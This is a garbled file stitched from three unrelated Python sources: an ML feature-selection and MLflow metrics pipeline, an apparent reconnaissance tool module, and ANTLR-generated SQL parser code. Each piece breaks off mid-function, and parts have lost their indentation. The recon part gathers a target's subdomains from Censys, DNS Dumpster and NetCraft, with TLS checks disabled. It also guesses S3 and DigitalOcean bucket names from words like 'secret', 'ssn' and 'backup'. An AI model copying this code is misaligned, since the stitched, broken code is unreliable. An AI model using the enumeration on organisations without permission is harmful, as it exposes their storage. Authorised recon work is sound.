    """Expand each partial experiment by the Cartesian product of parameter values.

    Args:
        experimentList: list of partial experiments, each a list of (step, params) tuples
        expParameters: dict mapping parameter name -> list of candidate values
        sKey: name of the pipeline step these parameters belong to
        inject: optional dict of extra parameters merged into every combination

    Returns:
        New list with one experiment per (input experiment x parameter combination).
    """
    paramNames = list(expParameters.keys())
    expanded = []
    for experiment in experimentList:
        for values in itertools.product(*expParameters.values()):
            combo = dict(zip(paramNames, values))
            if inject is not None:
                combo.update(inject)
            extendedExp = experiment.copy()
            extendedExp.append((sKey, combo))
            expanded.append(extendedExp)
    return expanded
# this is pretty non-generic, maybe there is a better way, for now it works.
def generateAllExperiments (experimentParameters, verbose = False):
    """Build the full grid of experiment configurations from the parameter spec.

    Sections are expanded in dict order; "FeatureSelection" additionally fans
    out over every (N, method) pair and "Classification" over every method.

    Args:
        experimentParameters: dict of section name -> parameter grid(s)
        verbose: when True, print each section as it is added

    Returns:
        List of experiments, each a list of (step, params) tuples.
    """
    experimentList = [ [] ]
    for section in experimentParameters.keys():
        if verbose == True:
            print ("Adding", section)
        if section == "BlockingStrategy":
            # single parameter grid for the blocking strategy
            experimentList = getExperiments (experimentList, experimentParameters[section].copy(), section)
        elif section == "FeatureSelection":
            # expand for every combination of feature count N and selection method
            print ("Adding feature selection")
            expanded = []
            for n in experimentParameters[section]["N"]:
                for methodName in experimentParameters[section]["Methods"]:
                    methodGrid = experimentParameters[section]["Methods"][methodName].copy()
                    methodGrid["nFeatures"] = [n]
                    expanded.extend(getExperiments (experimentList, methodGrid, methodName))
            experimentList = expanded
        elif section == "Classification":
            expanded = []
            for methodName in experimentParameters[section]["Methods"]:
                expanded.extend(getExperiments (experimentList, experimentParameters[section]["Methods"][methodName], methodName))
            experimentList = expanded
        else:
            experimentList = getExperiments (experimentList, experimentParameters[section], section)
    return experimentList
# if we do not want scaling to be performed on all data,
# we need to save the scaler. same for imputer.
def preprocessData (X, y):
    """Mean-impute missing values and z-score standardize all features.

    Note: both transformers are fit on the full data passed in; see the
    comment above about saving the fitted imputer/scaler to avoid leakage.

    Args:
        X (pd.DataFrame): feature matrix, possibly containing NaNs
        y: labels, passed through unchanged

    Returns:
        (X, y) with X imputed and standardized, column names preserved.
    """
    # SimpleImputer is not among this file's explicit imports; import it here
    # so the function does not depend on a star-import happening to provide it.
    from sklearn.impute import SimpleImputer
    simp = SimpleImputer(strategy="mean")
    X = pd.DataFrame(simp.fit_transform(X), columns = X.columns)
    sscal = StandardScaler()
    X = pd.DataFrame(sscal.fit_transform(X), columns = X.columns)
    return X, y
def applyFS (X, y, fExp):
    """Feature-selection hook: currently a pass-through that only logs the experiment."""
    print ("Applying", fExp)
    return X, y
def applyCLF (X, y, cExp, fExp = None):
    """Classifier-training hook: currently only logs and returns a placeholder model."""
    print ("Training", cExp, "on FS:", fExp)
    return "model"
def testModel (y_pred, y_true, idx, fold = None):
    """Score continuous predictions against ground truth.

    Predictions are thresholded at 0.5 after NaN scores are mapped to 0
    (naive bayes can produce NaN -- observed on ramella2018).

    Args:
        y_pred: continuous prediction scores
        y_true: ground-truth labels
        idx: sample identifiers used as the DataFrame index
        fold: unused tag (kept for interface compatibility)

    Returns:
        (stats dict, DataFrame of y_true/y_pred indexed by idx, accuracy)
    """
    truth = np.array(y_true)
    scores = np.nan_to_num(np.array(y_pred))
    hardLabels = [int(s >= 0.5) for s in scores]
    acc = accuracy_score(truth, hardLabels)
    df = pd.DataFrame ({"y_true": truth, "y_pred": scores}, index = idx)
    stats = {"y_pred": scores, "y_test": truth,
             "y_pred_int": hardLabels,
             "idx": np.array(idx).tolist()}
    return stats, df, acc
def getRunID (pDict):
    """Return a deterministic run identifier for a parameter dict.

    The ID is the MD5 hex digest of the dict serialized as canonical
    (key-sorted) JSON, so equal dicts always map to the same ID.
    """
    canonical = json.dumps(pDict, sort_keys=True).encode()
    return hashlib.md5(canonical).hexdigest()
def getAUCCurve (modelStats, dpi = 100):
    """Compute ROC AUC plus sensitivity/specificity at the optimal cutoff.

    Args:
        modelStats: dict with "y_test" and "y_pred" entries
        dpi: unused (kept for interface compatibility)

    Raises:
        Exception: if the computed AUC is NaN.
    """
    fpr, tpr, thresholds = roc_curve (modelStats["y_test"], modelStats["y_pred"])
    rocAUC = auc (fpr, tpr)
    if math.isnan(rocAUC):
        print ("ERROR: Unable to compute AUC of ROC curve. NaN detected!")
        print (modelStats["y_test"])
        print (modelStats["y_pred"])
        raise Exception ("Unable to compute AUC")
    sens, spec = findOptimalCutoff (fpr, tpr, thresholds)
    return rocAUC, sens, spec
def getPRCurve (modelStats, dpi = 100):
    """Compute the F1 score and the area under the precision-recall curve.

    Args:
        modelStats: dict with "y_test", "y_pred" and "y_pred_int" entries
        dpi: unused (kept for interface compatibility)

    Raises:
        Exception: if the PR-AUC is NaN; re-raises any f1_score failure.
    """
    precision, recall, thresholds = precision_recall_curve(modelStats["y_test"], modelStats["y_pred"])
    try:
        f1 = f1_score (modelStats["y_test"], modelStats["y_pred_int"])
    except Exception as err:
        print (modelStats["y_test"])
        print (modelStats["y_pred_int"])
        raise (err)
    prAUC = auc (recall, precision)
    if math.isnan(prAUC):
        print ("ERROR: Unable to compute AUC of PR curve. NaN detected!")
        print (modelStats["y_test"])
        print (modelStats["y_pred"])
        raise Exception ("Unable to compute AUC")
    return f1, prAUC
def logMetrics (foldStats):
    """Aggregate per-fold predictions and log all summary metrics to MLflow.

    Args:
        foldStats (dict): maps "fold..." keys to per-fold prediction dicts
            (as produced by testModel), plus "features" and "params" entries.

    Returns:
        dict: always empty; results are emitted via MLflow side effects.
    """
    y_preds = []
    y_test = []
    y_index = []
    aucList = {}
    # Pool predictions across all folds and record each fold's individual AUC.
    for k in foldStats:
        if "fold" in k:
            y_preds.extend(foldStats[k]["y_pred"])
            y_test.extend(foldStats[k]["y_test"])
            y_index.extend(foldStats[k]["idx"])
            fpr, tpr, thresholds = roc_curve (foldStats[k]["y_test"], foldStats[k]["y_pred"])
            area_under_curve = auc (fpr, tpr)
            aucList["AUC" + "_" + str(len(aucList))] = area_under_curve
    auc_mean = np.mean(list(aucList.values()))
    auc_std = np.std(list(aucList.values()))
    aucList["AUC_mean"] = auc_mean
    aucList["AUC_std"] = auc_std
    # All metrics below are computed on the pooled (cross-fold) predictions.
    modelStats, df, acc = testModel (y_preds, y_test, idx = y_index, fold = "ALL")
    roc_auc, sens, spec = getAUCCurve (modelStats, dpi = 72)
    f1, f1_auc = getPRCurve (modelStats, dpi = 72)
    #pprint(aucList)
    log_dict(aucList, "aucStats.json")
    # NOTE(review): modelStats holds predictions, yet is logged as "params.yml" -- confirm intent.
    log_dict(modelStats, "params.yml")
    log_metric ("Accuracy", acc)
    log_metric ("Sens", sens)
    log_metric ("Spec", spec)
    log_metric ("AUC", roc_auc)
    log_metric ("F1", f1)
    log_metric ("F1_AUC", f1_auc)
    #print (foldStats["features"])
    log_dict(foldStats["features"], "features.json")
    for k in foldStats["params"]:
        log_param (k, foldStats["params"][k])
    # Persist the pooled predictions as a CSV artifact.
    with tempfile.TemporaryDirectory() as temp_dir:
        predFile = os.path.join(temp_dir, "preds.csv")
        df.to_csv(predFile)
        mlflow.log_artifact(predFile)
    print(".", end = '', flush=True)
    return {}
def createFSel (fExp, cache = True):
method = fExp[0][0]
nFeatures = fExp[0][1]["nFeatures"]
if method == "LASSO":
C = fExp[0][1]["C"]
clf = LogisticRegression(penalty='l1', max_iter=500, solver='liblinear', C = C)
pipe = SelectFromModel(clf, prefit=False, max_features=nFeatures)
if method == "ET":
clf = ExtraTreesClassifier()
pipe = SelectFromModel(clf, prefit=False, max_features=nFeatures)
if method == "ReliefF":
from ITMO_FS.filters.univariate import reliefF_measure
pipe = SelectKBest(reliefF_measure, k = nFeatures)
if method == "MIM":
pipe = SelectKBest(mutual_info_classif, k = nFeatures)
if method == "Chi2":
from ITMO_FS.filters.univariate import chi2_measure
pipe = SelectKBest(chi2_measure, k = nFeatures)
if method == "Anova":
from ITMO_FS.filters.univariate import anova
pipe = SelectKBest(anova, k = nFeatures)
if method == "InformationGain":
from ITMO_FS.filters.univariate import information_gain
pipe = SelectKBest(information_gain, k = nFeatures)
if method == "GiniIndex":
from ITMO_FS.filters.univariate import gini_index
pipe = SelectKBest(gini_index, k = nFeatures)
if method == "SUMeasure":
from ITMO_FS.filters.univariate import su_measure
pipe = SelectKBest(su_measure, k = nFeatures)
if method == "FCBF":
from ITMO_FS.filters.multivariate.FCBF import FCBFDiscreteFilter
def fcbf_fct (X, y):
fcbf = FCBFDiscreteFilter()
fcbf.fit(X,y)
idxList = fcbf.selected_features
scores = [1 if idx in idxList else 0 for idx in range(X.shape[1])]
return np.array(scores)
pipe = SelectKBest(fcbf_fct, k = nFeatures)
if method == "MCFS":
from ITMO_FS.filters import MCFS
def mcfs_fct (X, y):
mcfs = MCFS(nFeatures, scheme='0-1') # dot is broken
idxList = mcfs.feature_ranking(X)
scores = [1 if idx in idxList else 0 for idx in range(X.shape[1])]
return np.array(scores)
pipe = SelectKBest(mcfs_fct, k = nFeatures)
if method == "UDFS":
from ITMO_FS.filters import UDFS
def udfs_fct (X, y):
udfs = UDFS(nFeatures)
idxList = udfs.feature_ranking(X)
scores = [1 if idx in idxList else 0 for idx in range(X.shape[1])]
return np.array(scores)
pipe = SelectKBest(udfs_fct, k = nFeatures)
if method == "Pearson":
from ITMO_FS.filters.univariate import pearson_corr
pipe = SelectKBest(pearson_corr, k = nFeatures)
if method == "Kendall":
from scipy.stats import kendalltau
def kendall_corr_fct (X, y):
scores = [0]*X.shape[1]
for k in range(X.shape[1]):
scores[k] = 1-kendalltau(X[:,k], y)[1]
return np.array(scores)
pipe = SelectKBest(kendall_corr_fct, k = nFeatures)
if method == "Fechner":
from ITMO_FS.filters.univariate import fechner_corr
pipe = SelectKBest(fechner_corr, k = nFeatures)
if method == "Spearman":
from ITMO_FS.filters.univariate import spearman_corr
pipe = SelectKBest(spearman_corr, k = nFeatures)
if method == "Laplacian":
from ITMO_FS.filters.univariate import laplacian_score
def laplacian_score_fct (X, y):
scores = laplacian_score(X,y)
return -scores
pipe = SelectKBest(laplacian_score_fct, k = nFeatures)
if method == "FisherScore":
from ITMO_FS.filters.univariate import f_ratio_measure
pipe = SelectKBest(f_ratio_measure, k = nFeatures)
if method == "Relief":
from extraFeatureSelections import relief_measure
pipe = SelectKBest(relief_measure, k = nFeatures)
if method == "JMI":
from skfeature.function.information_theoretical_based import JMI
def jmi_score (X, y, nFeatures):
sol, _, _ = JMI.jmi (X,y, n_selected_features = nFeatures)
scores = [0]*X.shape[1]
for j,z in enumerate(sol):
scores[z] = (len(sol) - j)/len(sol)
scores = np.asarray(scores, dtype = np.float32)
return scores
jmi_score_fct = partial(jmi_score, nFeatures = nFeatures)
pipe = SelectKBest(jmi_score_fct, k = nFeatures)
if method == "ICAP":
from skfeature.function.information_theoretical_based import ICAP
def icap_score (X, y, nFeatures):
sol, _, _ =ICAP.icap (X,y, n_selected_features = nFeatures)
scores = [0]*X.shape[1]
for j,z in enumerate(sol):
scores[z] = (len(sol) - j)/len(sol)
scores = np.asarray(scores, dtype = np.float32)
return scores
icap_score_fct = partial(icap_score, nFeatures = nFeatures)
pipe = SelectKBest(icap_score_fct, k = nFeatures)
# not exported
if method == "DCSF":
from ITMO_FS.filters.multivariate import DCSF
def dcsf_score_fct (X, y):
selected_features | |
issuer, subject, and a hash
Censys uses for the /view/ API calls to fetch additional information.
A free API key is required.
"""
if self.censys_cert_search is None:
pass
else:
try:
print(green("[+] Performing Censys certificate search for {}".format(target)))
query = "parsed.names: %s" % target
results = self.censys_cert_search.search(query, fields=['parsed.names',
'parsed.signature_algorithm.name','parsed.signature.self_signed',
'parsed.validity.start','parsed.validity.end','parsed.fingerprint_sha256',
'parsed.subject_dn','parsed.issuer_dn'])
return results
except censys.base.CensysRateLimitExceededException:
print(red("[!] Censys reports your account has run out of API credits."))
return None
except Exception as error:
print(red("[!] Error collecting Censys certificate data for {}.".format(target)))
print(red("L.. Details: {}".format(error)))
return None
def parse_cert_subdomain(self, subject_dn):
    """Extract the CN (common name) value from a certificate subject DN string."""
    # Multi-component DNs: skip to just after "CN="; otherwise assume the DN
    # starts with "CN=" and skip the first three characters.
    if "," in subject_dn:
        start = subject_dn.find('CN=') + 3
    else:
        start = 3
    remainder = subject_dn[start:]
    # Cut at the next component separator, if one follows the CN value.
    comma = remainder.find(",")
    if comma != -1:
        remainder = remainder[:comma]
    return remainder
def filter_subdomains(self, domain, subdomains):
    """Drop wildcard entries and hosts that do not belong to the target domain.

    Certificate searches can surface unrelated hosts (e.g. a search for
    blizzard.com on Censys can return iran-blizzard.ir); only non-wildcard
    names that end with the target domain are kept.
    Credit to christophetd for the original idea:
    https://github.com/christophetd/censys-subdomain-finder/blob/master/censys_subdomain_finder.py#L31
    """
    kept = []
    for candidate in subdomains:
        if '*' in candidate:
            continue
        if candidate.endswith(domain):
            kept.append(candidate)
    return kept
def run_urlvoid_lookup(self, domain):
    """Collect reputation data from URLVoid for the target domain. This returns an ElementTree
    object.
    A free API key is required.
    """
    # URLVoid only handles domain names, so skip IP-address targets.
    if not helpers.is_ip(domain):
        try:
            if self.urlvoid_api_key != "":
                url = "http://api.urlvoid.com/api1000/{}/host/{}"\
                    .format(self.urlvoid_api_key, domain)
                response = requests.get(url)
                # The API responds with XML; return the parsed element tree.
                tree = ET.fromstring(response.content)
                return tree
            else:
                print(green("[-] No URLVoid API key, so skipping this test."))
                return None
        except Exception as error:
            print(red("[!] Could not load URLVoid for reputation check!"))
            print(red("L.. Details: {}".format(error)))
            return None
    else:
        print(red("[!] Target is not a domain, so skipping URLVoid queries."))
        # NOTE(review): this branch implicitly returns None.
def check_dns_dumpster(self, domain):
    """Function to collect subdomains known to DNS Dumpster for the provided domain. This is
    based on PaulSec's unofficial DNS Dumpster API available on GitHub.

    Returns a dict with the domain, parsed DNS/MX/TXT/host records, and the
    base64-encoded network-map image (or None if it could not be fetched).
    """
    dnsdumpster_url = "https://dnsdumpster.com/"
    results = {}
    cookies = {}
    # DNS Dumpster requires a CSRF token, so perform an initial GET to obtain one.
    requests.packages.urllib3.disable_warnings()
    session = requests.session()
    request = session.get(dnsdumpster_url, verify=False)
    csrf_token = session.cookies['csrftoken']
    cookies['csrftoken'] = session.cookies['csrftoken']
    headers = {'Referer': dnsdumpster_url}
    data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
    request = session.post(dnsdumpster_url, cookies=cookies, data=data, headers=headers)
    if request.status_code != 200:
        print(red("[+] There appears to have been an error communicating with DNS Dumpster -- {} \
received!".format(request.status_code)))
    # NOTE(review): parsing continues even after a non-200 response; the table
    # indexing below may then raise -- confirm whether an early return is wanted.
    soup = BeautifulSoup(request.content, 'lxml')
    tables = soup.findAll('table')
    results = {}
    results['domain'] = domain
    results['dns_records'] = {}
    # Table order on the results page: DNS, MX, TXT, then host records.
    results['dns_records']['dns'] = self.retrieve_results(tables[0])
    results['dns_records']['mx'] = self.retrieve_results(tables[1])
    results['dns_records']['txt'] = self.retrieve_txt_record(tables[2])
    results['dns_records']['host'] = self.retrieve_results(tables[3])
    # Try to fetch the network mapping image
    try:
        val = soup.find('img', attrs={'class': 'img-responsive'})['src']
        tmp_url = "{}{}".format(dnsdumpster_url, val)
        image_data = base64.b64encode(requests.get(tmp_url).content)
    except Exception:
        image_data = None
    finally:
        results['image_data'] = image_data
    return results
def retrieve_results(self, table):
    """Parse one DNS Dumpster results table into a list of record dicts.

    Each row yields a dict with domain, ip, reverse_dns, as, provider,
    country and header fields extracted from the row's three cells.
    """
    ip_pattern = re.compile(r'([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})')
    records = []
    for row in table.findAll('tr'):
        cells = row.findAll('td')
        # First cell: "<domain> <header...>" possibly with embedded newlines.
        host_parts = cells[0].text.replace('\n', '').split(' ')
        # Third cell: "<AS> <provider...> <country>"; country also sits in a span.
        info_text = cells[2].text
        country = cells[2].find('span', attrs={}).text
        asn = info_text.split(' ')[0]
        provider = ' '.join(info_text.split(' ')[1:]).replace(country, '')
        records.append({'domain': host_parts[0],
                        'ip': ip_pattern.findall(cells[1].text)[0],
                        'reverse_dns': cells[1].find('span', attrs={}).text,
                        'as': asn,
                        'provider': provider,
                        'country': country,
                        'header': ' '.join(host_parts[1:])})
    return records
def retrieve_txt_record(self, table):
    """Collect the text of every TXT-record cell in the given results table."""
    return [cell.text for cell in table.findAll('td')]
def check_netcraft(self, domain):
    """Function to collect subdomains known to NetCraft for the provided domain. NetCraft blocks
    scripted requests by requiring cookies and JavaScript for all browser, so Selenium is
    required.
    This is based on code from the DataSploit project, but updated to work with today's
    NetCraft.
    """
    results = []
    netcraft_url = "http://searchdns.netcraft.com/?host=%s" % domain
    target_dom_name = domain.split(".")
    self.browser.get(netcraft_url)
    # Each result row links to a site report whose URL embeds the found host.
    link_regx = re.compile('<a href="http://toolbar.netcraft.com/site_report\?url=(.*)">')
    links_list = link_regx.findall(self.browser.page_source)
    for x in links_list:
        dom_name = x.split("/")[2].split(".")
        # Keep only hosts whose last two labels match the target domain.
        if (dom_name[len(dom_name) - 1] == target_dom_name[1]) and \
           (dom_name[len(dom_name) - 2] == target_dom_name[0]):
            results.append(x.split("/")[2])
    # Determine how many results NetCraft reported so pagination can proceed.
    num_regex = re.compile('Found (.*) site')
    num_subdomains = num_regex.findall(self.browser.page_source)
    if not num_subdomains:
        num_regex = re.compile('First (.*) sites returned')
        num_subdomains = num_regex.findall(self.browser.page_source)
    if num_subdomains:
        if num_subdomains[0] != str(0):
            # NetCraft pages results 20 at a time.
            num_pages = int(num_subdomains[0]) // 20 + 1
            if num_pages > 1:
                # Pagination needs the last host of the current page as a cursor.
                last_regex = re.compile(
                    '<td align="left">%s.</td><td align="left">\n<a href="(.*)" rel="nofollow">' % (20))
                last_item = last_regex.findall(self.browser.page_source)[0].split("/")[2]
                next_page = 21
                for x in range(2, num_pages):
                    url = "http://searchdns.netcraft.com/?host=%s&last=%s&from=%s&restriction=/site%%20contains" % (domain, last_item, next_page)
                    self.browser.get(url)
                    link_regx = re.compile(
                        '<a href="http://toolbar.netcraft.com/site_report\?url=(.*)">')
                    links_list = link_regx.findall(self.browser.page_source)
                    for y in links_list:
                        dom_name1 = y.split("/")[2].split(".")
                        if (dom_name1[len(dom_name1) - 1] == target_dom_name[1]) and \
                           (dom_name1[len(dom_name1) - 2] == target_dom_name[0]):
                            results.append(y.split("/")[2])
                    # Advance the pagination cursor to the last host seen.
                    last_item = links_list[len(links_list) - 1].split("/")[2]
                    next_page = 20 * x + 1
        else:
            pass
    return results
def fetch_netcraft_domain_history(self, domain):
    """Function to fetch a domain's IP address history from NetCraft.

    Returns a list of [ip, owner] pairs scraped from the site report page.
    """
    # TODO: See if the "Last Seen" and other data can be easily collected for here
    ip_history = []
    endpoint = "http://toolbar.netcraft.com/site_report?url=%s" % domain
    # Brief pause before hitting NetCraft again.
    time.sleep(1)
    self.browser.get(endpoint)
    soup = BeautifulSoup(self.browser.page_source, 'html.parser')
    # Netblock links carry the historical IP/owner information.
    urls_parsed = soup.findAll('a', href=re.compile(r".*netblock\?q.*"))
    for url in urls_parsed:
        # The first matching link is a header row, so skip it.
        if urls_parsed.index(url) != 0:
            result = [str(url).split('=')[2].split(">")[1].split("<")[0], \
                      str(url.parent.findNext('td')).strip("<td>").strip("</td>")]
            ip_history.append(result)
    return ip_history
def enumerate_buckets(self, client, domain, wordlist=None, fix_wordlist=None):
    """Function to search for AWS S3 buckets and accounts. Default search terms are the
    client, domain, and domain without its TLD. A wordlist is optional.
    This is based on modules from aws_pwn by dagrz on GitHub.

    Args:
        client: client/organization name used to seed keyword candidates
        domain: target domain, e.g. example.com
        wordlist: optional path to a file of extra keywords (one per line)
        fix_wordlist: optional path to a file of extra prefixes/suffixes

    Returns:
        (bucket_results, account_results) lists, one entry per check performed.
    """
    # Take the user input as the initial list of keywords here
    # Both example.com and example are valid bucket names, so domain+tld and domain are tried
    search_terms = [domain, domain.split(".")[0], client.replace(" ", "").lower()]
    # Potentially valid and interesting keywords that might be used a prefix or suffix
    fixes = ["apps", "downloads", "software", "deployment", "qa", "dev", "test", "vpn",
             "secret", "user", "confidential", "invoice", "config", "backup", "bak",
             "xls", "csv", "ssn", "resources", "web", "testing", "uac", "legacy", "adhoc",
             "docs", "documents", "res"]
    bucket_results = []
    account_results = []
    # Add user-provided wordlist terms to our list of search terms
    if wordlist is not None:
        with open(wordlist, "r") as bucket_list:
            for name in bucket_list:
                name = name.strip()
                # Skip blank lines and '#' comments.
                if name and not name.startswith('#'):
                    search_terms.append(name)
    # Add user-provided list of pre/suffixes to our list of fixes
    if fix_wordlist is not None:
        with open(fix_wordlist, "r") as new_fixes:
            for fix in new_fixes:
                fix = fix.strip()
                if fix and not fix.startswith('#'):
                    fixes.append(fix)
    # Modify search terms with some common prefixes and suffixes
    # We use this new list to avoid endlessly looping
    final_search_terms = []
    for fix in fixes:
        for term in search_terms:
            final_search_terms.append(fix + "-" + term)
            final_search_terms.append(term + "-" + fix)
            final_search_terms.append(fix + term)
            final_search_terms.append(term + fix)
    # Now include our original list of base terms
    for term in search_terms:
        final_search_terms.append(term)
    # Ensure we have only unique search terms in our list and start hunting
    final_search_terms = list(set(final_search_terms))
    print(yellow("[*] Your provided keywords and prefixes/suffixes have been combined to \
create {} possible buckets and spaces to check in AWS and three Digital Ocean regions".format(
len(final_search_terms))))
    with click.progressbar(final_search_terms,
                           label="Enumerating AWS Keywords",
                           length=len(final_search_terms)) as bar:
        for term in bar:
            # Check for buckets and spaces
            # NOTE(review): S3/Spaces checks run only with a boto3 client, but the
            # account check below runs for every term regardless.
            if self.boto3_client is not None:
                result = self.validate_bucket('head', term)
                bucket_results.append(result)
                result = self.validate_do_space("ams3", term)
                bucket_results.append(result)
                result = self.validate_do_space("nyc3", term)
                bucket_results.append(result)
                result = self.validate_do_space("sgp1", term)
                bucket_results.append(result)
            # Check for accounts
            result = self.validate_account(term)
            account_results.append(result)
    return bucket_results, account_results
def validate_bucket(self, validation_type, bucket_name):
    """Dispatch bucket validation to the helper registered for the given type.

    Only 'head' is registered today; an unknown validation_type raises
    KeyError (matching the original behavior).
    """
    dispatch = {
        'head': self.validate_bucket_head
    }
    handler = dispatch[validation_type]
    if handler:
        return handler(bucket_name)
def validate_bucket_head(self, bucket_name):
"""Function to check a string to see if it exists as the name of an Amazon S3 bucket. This
version uses awscli to identify a bucket and then uses Requests to check public access. The
benefit of this is awscli will gather information from buckets that are otherwise
inaccessible via web requests.
"""
# This test requires authentication
# Warning: Check credentials before use
error_values = {
'400': True,
'403': True,
'404': False
}
result = {
'bucketName': bucket_name,
'bucketUri': 'http://' + bucket_name + '.s3.amazonaws.com',
'arn': 'arn:aws:s3:::' + bucket_name,
'exists': False,
'public': False
}
try:
self.boto3_client.head_bucket(Bucket=bucket_name)
result['exists'] = True
try:
# Request the bucket to check the response
request = requests.get(result['bucketUri'])
# | |
self.state = 104
self.alterDatabase()
pass
elif la_ == 3:
self.state = 105
self.dropDatabase()
pass
elif la_ == 4:
self.state = 106
self.showDatabase()
pass
elif la_ == 5:
self.state = 107
self.useDatabase()
pass
elif la_ == 6:
self.state = 108
self.opTable()
pass
self.state = 122
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
self.state = 111
self.match(SQLGramaticaParser.T__1)
self.state = 118
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,4,self._ctx)
if la_ == 1:
self.state = 112
self.createDatabase()
pass
elif la_ == 2:
self.state = 113
self.alterDatabase()
pass
elif la_ == 3:
self.state = 114
self.dropDatabase()
pass
elif la_ == 4:
self.state = 115
self.showDatabase()
pass
elif la_ == 5:
self.state = 116
self.useDatabase()
pass
elif la_ == 6:
self.state = 117
self.opTable()
pass
self.state = 124
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,5,self._ctx)
self.state = 126
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==SQLGramaticaParser.T__1:
self.state = 125
self.match(SQLGramaticaParser.T__1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class CreateDatabaseContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `createDatabase` rule."""
    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.CreateDatabaseContext, self).__init__(parent, invokingState)
        self.parser = parser
    def CREATE(self):
        # Accessor for the CREATE keyword token.
        return self.getToken(SQLGramaticaParser.CREATE, 0)
    def DATABASE(self):
        # Accessor for the DATABASE keyword token.
        return self.getToken(SQLGramaticaParser.DATABASE, 0)
    def IDX(self):
        # Accessor for the database-name identifier token.
        return self.getToken(SQLGramaticaParser.IDX, 0)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_createDatabase
    def enterRule(self, listener):
        # Listener dispatch on rule entry (only if the listener implements it).
        if hasattr(listener, "enterCreateDatabase"):
            listener.enterCreateDatabase(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitCreateDatabase"):
            listener.exitCreateDatabase(self)
    def accept(self, visitor):
        # Visitor dispatch: prefer the rule-specific visit method when present.
        if hasattr(visitor, "visitCreateDatabase"):
            return visitor.visitCreateDatabase(self)
        else:
            return visitor.visitChildren(self)

def createDatabase(self):
    """Parse the `createDatabase` rule: CREATE DATABASE <IDX>."""
    localctx = SQLGramaticaParser.CreateDatabaseContext(self, self._ctx, self.state)
    self.enterRule(localctx, 8, self.RULE_createDatabase)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 128
        self.match(SQLGramaticaParser.CREATE)
        self.state = 129
        self.match(SQLGramaticaParser.DATABASE)
        self.state = 130
        self.match(SQLGramaticaParser.IDX)
    except RecognitionException as re:
        # Standard ANTLR recovery: record, report, resynchronize.
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class AlterDatabaseContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `alterDatabase` rule."""
    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.AlterDatabaseContext, self).__init__(parent, invokingState)
        self.parser = parser
    def ALTER(self):
        return self.getToken(SQLGramaticaParser.ALTER, 0)
    def DATABASE(self):
        return self.getToken(SQLGramaticaParser.DATABASE, 0)
    def IDX(self, i=None):
        # The rule contains two identifiers (old and new name): with no index
        # return all IDX tokens, otherwise the i-th one.
        if i is None:
            return self.getTokens(SQLGramaticaParser.IDX)
        else:
            return self.getToken(SQLGramaticaParser.IDX, i)
    def RENAME(self):
        return self.getToken(SQLGramaticaParser.RENAME, 0)
    def TO(self):
        return self.getToken(SQLGramaticaParser.TO, 0)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_alterDatabase
    def enterRule(self, listener):
        if hasattr(listener, "enterAlterDatabase"):
            listener.enterAlterDatabase(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitAlterDatabase"):
            listener.exitAlterDatabase(self)
    def accept(self, visitor):
        if hasattr(visitor, "visitAlterDatabase"):
            return visitor.visitAlterDatabase(self)
        else:
            return visitor.visitChildren(self)

def alterDatabase(self):
    """Parse the `alterDatabase` rule: ALTER DATABASE <IDX> RENAME TO <IDX>."""
    localctx = SQLGramaticaParser.AlterDatabaseContext(self, self._ctx, self.state)
    self.enterRule(localctx, 10, self.RULE_alterDatabase)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 132
        self.match(SQLGramaticaParser.ALTER)
        self.state = 133
        self.match(SQLGramaticaParser.DATABASE)
        self.state = 134
        self.match(SQLGramaticaParser.IDX)
        self.state = 135
        self.match(SQLGramaticaParser.RENAME)
        self.state = 136
        self.match(SQLGramaticaParser.TO)
        self.state = 137
        self.match(SQLGramaticaParser.IDX)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class DropDatabaseContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `dropDatabase` rule."""
    def __init__(self, parser, parent=None, invokingState=-1):
        super(SQLGramaticaParser.DropDatabaseContext, self).__init__(parent, invokingState)
        self.parser = parser
    def DROP(self):
        return self.getToken(SQLGramaticaParser.DROP, 0)
    def DATABASE(self):
        return self.getToken(SQLGramaticaParser.DATABASE, 0)
    def IDX(self):
        return self.getToken(SQLGramaticaParser.IDX, 0)
    def getRuleIndex(self):
        return SQLGramaticaParser.RULE_dropDatabase
    def enterRule(self, listener):
        if hasattr(listener, "enterDropDatabase"):
            listener.enterDropDatabase(self)
    def exitRule(self, listener):
        if hasattr(listener, "exitDropDatabase"):
            listener.exitDropDatabase(self)
    def accept(self, visitor):
        if hasattr(visitor, "visitDropDatabase"):
            return visitor.visitDropDatabase(self)
        else:
            return visitor.visitChildren(self)

def dropDatabase(self):
    """Parse the `dropDatabase` rule: DROP DATABASE <IDX>."""
    localctx = SQLGramaticaParser.DropDatabaseContext(self, self._ctx, self.state)
    self.enterRule(localctx, 12, self.RULE_dropDatabase)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 139
        self.match(SQLGramaticaParser.DROP)
        self.state = 140
        self.match(SQLGramaticaParser.DATABASE)
        self.state = 141
        self.match(SQLGramaticaParser.IDX)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ShowDatabaseContext(ParserRuleContext):
    """ANTLR-generated parse-tree context for the `showDatabase` rule."""
